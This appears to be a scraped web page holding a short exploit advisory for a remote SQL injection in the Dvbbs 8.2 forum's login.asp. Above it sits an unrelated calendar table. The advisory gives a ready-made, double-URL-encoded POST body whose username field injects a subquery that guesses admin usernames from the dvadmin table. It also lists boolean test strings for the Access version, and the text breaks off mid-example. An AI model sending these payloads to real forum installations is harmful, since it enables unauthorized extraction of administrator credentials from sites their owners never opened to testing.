| Mon | Tue | Wed | Thu | Fri | Sat | Sun |
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 | |
dvbbs8.2(access/sql)version login.asp remote sql injection
( 189 days 1 hour ago)
name: where (topsec security research group) email: hackerbathotmail.com Subject: dvbbs8.2(access/sql)version login.asp remote sql injection danger level: critical/High info: dvbbs is prone to multiple sql injection security flaw interrelated code to access version(exp): password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dvadmin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271 Examples(access version): decide Where’ and ‘1’=’1 where’ and ‘1’=’2 ...




